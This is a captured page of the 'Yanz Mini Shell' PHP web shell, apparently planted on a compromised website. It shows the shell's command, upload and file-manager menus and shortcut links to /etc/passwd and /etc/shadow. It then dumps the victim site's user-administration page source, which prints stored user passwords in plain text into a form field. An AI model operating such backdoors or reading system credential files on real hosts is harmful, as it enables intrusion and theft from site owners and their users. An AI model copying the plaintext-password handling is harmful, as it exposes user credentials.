Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php include "header.php"; if(isset($_GET['id'])){ $ids = $_GET['id']; $title = "Update"; $ajax = "update_users"; $success = "Updated"; $statement = $pdo->prepare("SELECT * FROM tbl_users e where e.id=?"); $statement->execute(array($ids)); $datas = $statement->fetchAll(PDO::FETCH_ASSOC); $totalData = $statement->rowCount(); $branch_ids = explode(",",$datas[0]['branch_ids']); }else{ $ids = 0; $title = "Create"; $ajax = "create_users"; $success = "Created"; $branch_ids = ""; } ?> <div class="content-wrapper" style="margin:0px;margin-top:-50px"> <section class="content-header"> <h1><?=$title?> Users</h1> </section> <div class="clearfix"></div> <section class="content"> <div class="row"> <div class="col-xs-12"> <div class="box box-primary" style="box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px;"> <div class="box-body"> <div id="content-div"> <div class="col-lg-12"> <form id="form_details" autocomplete="off"> <input type="hidden" name="ids" value="<?=$ids?>" class="form-control" id="ids" required="required" /> <div class="row"> <div class="col-md-4"> <div class="form-group"> <label class="required" for="name">Name</label> <input type="text" name="name" value="<?php if($datas){ echo $datas[0]['name']; }?>" placeholder="Enter the Name" class="form-control" id="name" required="required" /> </div> </div> <div class="col-md-4"> <div class="form-group"> <label class="required" for="email">Email</label> <input type="email" name="email" value="<?php if($datas){ echo $datas[0]['email']; }?>" placeholder="Enter the Email" class="form-control" id="email" required="required" /> </div> </div> <div class="col-md-4"> <div class="form-group"> <label class="required" for="password">Password</label> <input type="text" name="password" placeholder="Enter the Password" value="<?php if($datas){ echo $datas[0]['password']; }?>" class="form-control" id="password" autocomplete="off" required="required" /> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="mobile">Mobile Number</label> <input type="number" name="mobile" placeholder="Enter the Mobile Number" value="<?php if($datas){ echo $datas[0]['mobile']; }?>" class="form-control" id="mobile" /> </div> </div> <div class="col-md-4"> <div class="form-group"> <label class="required" for="role_id">Role</label> <select name="role_id" class="form-control select2" style="width:100%" id="role_id" required="required"> <option value="">Select Role</option> <?php $statement = $pdo->prepare("SELECT * FROM `tbl_role` where status=1 and id!=0"); $statement->execute(); $location_result = $statement->fetchAll(PDO::FETCH_ASSOC); foreach ($location_result as $result) { ?> <option value="<?=$result['id']?>"<?php if($datas[0]['role_id']==$result['id']){echo "selected";} ?>> <?=$result['role_name']?></option> <?php } ?> </select> </div> </div> <!--<div class="col-md-4">--> <!-- <div class="form-group">--> <!-- <label for="username">User Name</label> --> <!-- <input type="username" name="username" placeholder="Enter the User Name" value="<?php if($datas){ echo $datas[0]['username']; }?>" class="form-control" id="username" autocomplete="false" />--> <!-- </div>--> <!--</div>--> </div> <div class="form-group" style="text-align:center;"> <input type="submit" id="submit" value="Submit" class="btn btn-success" /> </div> </form> </div> <div class="form-group" style="text-align:center;"> <span onclick="location.reload();"><button class="btn btn-primary" ><i class="fa fa-refresh"></i> Reset Form</button></span> <a href="users-list.php"><button class="btn btn-warning" ><i class="fa fa-chevron-left"></i> Back to List</button></a> </div> </div> <div class="container" id="loading-div" style="display: none; margin-top: 40px; margin-bottom: 40px;"> <center> <img src="img/loading.gif" style="width: 250px;"><br><b class="blinking">Processing Please Wait...</b></center> </div> <div class="container" id="success-div" style="display: none; margin-top: 40px; margin-bottom: 40px;"> <center><b class="blinking" style="font-size:22px;">User <?=$success?> Successfully...</b><br> <img src="img/success.gif" style="width: 250px;"> <br><br> <span onclick="location.reload();"><button class="btn btn-info"><i class="fa fa-refresh"></i> Reset Form</button></span> <a href="users-list.php"><button class="btn btn-warning"><i class="fa fa-chevron-left"></i> Back to List</button></a> </center> </div> <div class="clearfix"></div> </div> </div> </div> </div> </section> </div> <?php include "footer.php"; ?> <script> $(document).ready(function() { $('#form_details').on('submit', function(e){ e.preventDefault(); $('#loading-div').show(); $('#content-div').hide(); $("#submit").prop('disabled', true); var formData = new FormData(this); formData.append('type', '<?=$ajax?>'); $.ajax({ url: 'apis/users.php', type: 'post', dataType: 'json', data: formData, cache: false, contentType: false, processData: false, enctype: 'multipart/form-data', success: function (response) { console.log(response); if(response['status']==200){ alert(response['message']); $('#form_details').trigger("reset"); $("#submit").prop('disabled', false); $('#success-div').show(); $('#loading-div').hide(); }else{ alert(response['message']); $("#submit").prop('disabled', false); $('#loading-div').hide(); $('#content-div').show(); } } }); }); }); </script>
Free Space : 11555725312 Byte